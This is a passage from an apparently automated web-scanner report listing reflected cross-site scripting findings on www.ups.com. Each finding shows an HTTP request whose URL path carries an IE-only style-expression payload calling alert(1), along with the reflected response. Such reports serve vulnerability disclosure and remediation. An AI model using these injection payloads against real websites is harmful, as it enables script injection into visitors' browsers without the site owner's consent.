This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enb37ff"style%3d"x%3aexpression(alert(1))"31afa948299/about/sites.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enb37ff"style="x:expression(alert(1))"31afa948299/about/sites.html">
...[SNIP]...

1.38. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/contact/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8f4"style%3d"x%3aexpression(alert(1))"fcfe492b074 was submitted in the REST URL parameter 2. This input was echoed as 2d8f4"style="x:expression(alert(1))"fcfe492b074 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us2d8f4"style%3d"x%3aexpression(alert(1))"fcfe492b074/en/contact/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34942


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us2d8f4"style="x:expression(alert(1))"fcfe492b074/en/contact/index.html">
...[SNIP]...

1.39. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/contact/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa5fa"style%3d"x%3aexpression(alert(1))"9d771ad853c was submitted in the REST URL parameter 3. This input was echoed as aa5fa"style="x:expression(alert(1))"9d771ad853c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enaa5fa"style%3d"x%3aexpression(alert(1))"9d771ad853c/contact/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34942


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enaa5fa"style="x:expression(alert(1))"9d771ad853c/contact/index.html">
...[SNIP]...

1.40. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/air_freight.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65eef"style%3d"x%3aexpression(alert(1))"422f4a3ffb3 was submitted in the REST URL parameter 2. This input was echoed as 65eef"style="x:expression(alert(1))"422f4a3ffb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us65eef"style%3d"x%3aexpression(alert(1))"422f4a3ffb3/en/freight/air_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39188


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us65eef"style="x:expression(alert(1))"422f4a3ffb3/en/freight/air_freight.html">
...[SNIP]...

1.41. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/air_freight.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf815"style%3d"x%3aexpression(alert(1))"af04c03eaf was submitted in the REST URL parameter 3. This input was echoed as bf815"style="x:expression(alert(1))"af04c03eaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enbf815"style%3d"x%3aexpression(alert(1))"af04c03eaf/freight/air_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39186


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enbf815"style="x:expression(alert(1))"af04c03eaf/freight/air_freight.html">
...[SNIP]...

1.42. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/customsbrokerage.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e44"style%3d"x%3aexpression(alert(1))"3c86ba18c31 was submitted in the REST URL parameter 2. This input was echoed as 38e44"style="x:expression(alert(1))"3c86ba18c31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us38e44"style%3d"x%3aexpression(alert(1))"3c86ba18c31/en/freight/customsbrokerage.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37750


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us38e44"style="x:expression(alert(1))"3c86ba18c31/en/freight/customsbrokerage.html">
...[SNIP]...

1.43. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/customsbrokerage.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32303"style%3d"x%3aexpression(alert(1))"4d43a21c9a7 was submitted in the REST URL parameter 3. This input was echoed as 32303"style="x:expression(alert(1))"4d43a21c9a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en32303"style%3d"x%3aexpression(alert(1))"4d43a21c9a7/freight/customsbrokerage.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:05 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37750


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en32303"style="x:expression(alert(1))"4d43a21c9a7/freight/customsbrokerage.html">
...[SNIP]...

1.44. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/expedite.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec17"style%3d"x%3aexpression(alert(1))"a447423ebc1 was submitted in the REST URL parameter 2. This input was echoed as bec17"style="x:expression(alert(1))"a447423ebc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usbec17"style%3d"x%3aexpression(alert(1))"a447423ebc1/en/freight/expedite.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37504


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usbec17"style="x:expression(alert(1))"a447423ebc1/en/freight/expedite.html">
...[SNIP]...

1.45. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/expedite.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb98d"style%3d"x%3aexpression(alert(1))"6d07b93d538 was submitted in the REST URL parameter 3. This input was echoed as eb98d"style="x:expression(alert(1))"6d07b93d538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/eneb98d"style%3d"x%3aexpression(alert(1))"6d07b93d538/freight/expedite.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37504


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/eneb98d"style="x:expression(alert(1))"6d07b93d538/freight/expedite.html">
...[SNIP]...

1.46. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bdd"style%3d"x%3aexpression(alert(1))"a19badde730 was submitted in the REST URL parameter 2. This input was echoed as 97bdd"style="x:expression(alert(1))"a19badde730 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us97bdd"style%3d"x%3aexpression(alert(1))"a19badde730/en/freight/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:54 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us97bdd"style="x:expression(alert(1))"a19badde730/en/freight/index.html">
...[SNIP]...

1.47. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b6f6"style%3d"x%3aexpression(alert(1))"c09d8225dde was submitted in the REST URL parameter 3. This input was echoed as 8b6f6"style="x:expression(alert(1))"c09d8225dde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en8b6f6"style%3d"x%3aexpression(alert(1))"c09d8225dde/freight/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en8b6f6"style="x:expression(alert(1))"c09d8225dde/freight/index.html">
...[SNIP]...

1.48. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/ocean_freight.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a8dd"style%3d"x%3aexpression(alert(1))"fffaad3b696 was submitted in the REST URL parameter 2. This input was echoed as 8a8dd"style="x:expression(alert(1))"fffaad3b696 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us8a8dd"style%3d"x%3aexpression(alert(1))"fffaad3b696/en/freight/ocean_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:02 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38501


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us8a8dd"style="x:expression(alert(1))"fffaad3b696/en/freight/ocean_freight.html">
...[SNIP]...

1.49. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/ocean_freight.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b9c"style%3d"x%3aexpression(alert(1))"35cba245cf4 was submitted in the REST URL parameter 3. This input was echoed as 17b9c"style="x:expression(alert(1))"35cba245cf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en17b9c"style%3d"x%3aexpression(alert(1))"35cba245cf4/freight/ocean_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38501


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en17b9c"style="x:expression(alert(1))"35cba245cf4/freight/ocean_freight.html">
...[SNIP]...

1.50. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/road_freight.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb8ff"style%3d"x%3aexpression(alert(1))"0fcdf3c310f was submitted in the REST URL parameter 2. This input was echoed as fb8ff"style="x:expression(alert(1))"0fcdf3c310f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usfb8ff"style%3d"x%3aexpression(alert(1))"0fcdf3c310f/en/freight/road_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:57 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37911


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usfb8ff"style="x:expression(alert(1))"0fcdf3c310f/en/freight/road_freight.html">
...[SNIP]...

1.51. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/road_freight.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa4d4"style%3d"x%3aexpression(alert(1))"2cc934cd1f8 was submitted in the REST URL parameter 3. This input was echoed as aa4d4"style="x:expression(alert(1))"2cc934cd1f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enaa4d4"style%3d"x%3aexpression(alert(1))"2cc934cd1f8/freight/road_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:58 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37911


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enaa4d4"style="x:expression(alert(1))"2cc934cd1f8/freight/road_freight.html">
...[SNIP]...

1.52. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/index.jsx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b59c3"style%3d"x%3aexpression(alert(1))"cb5adea911c was submitted in the REST URL parameter 2. This input was echoed as b59c3"style="x:expression(alert(1))"cb5adea911c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usb59c3"style%3d"x%3aexpression(alert(1))"cb5adea911c/en/index.jsx HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:59 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124319


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usb59c3"style="x:expression(alert(1))"cb5adea911c/en/index.jsx">
...[SNIP]...

1.53. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/index.jsx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2732"style%3d"x%3aexpression(alert(1))"04a1cbd1897 was submitted in the REST URL parameter 3. This input was echoed as c2732"style="x:expression(alert(1))"04a1cbd1897 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enc2732"style%3d"x%3aexpression(alert(1))"04a1cbd1897/index.jsx HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:00 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124319


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
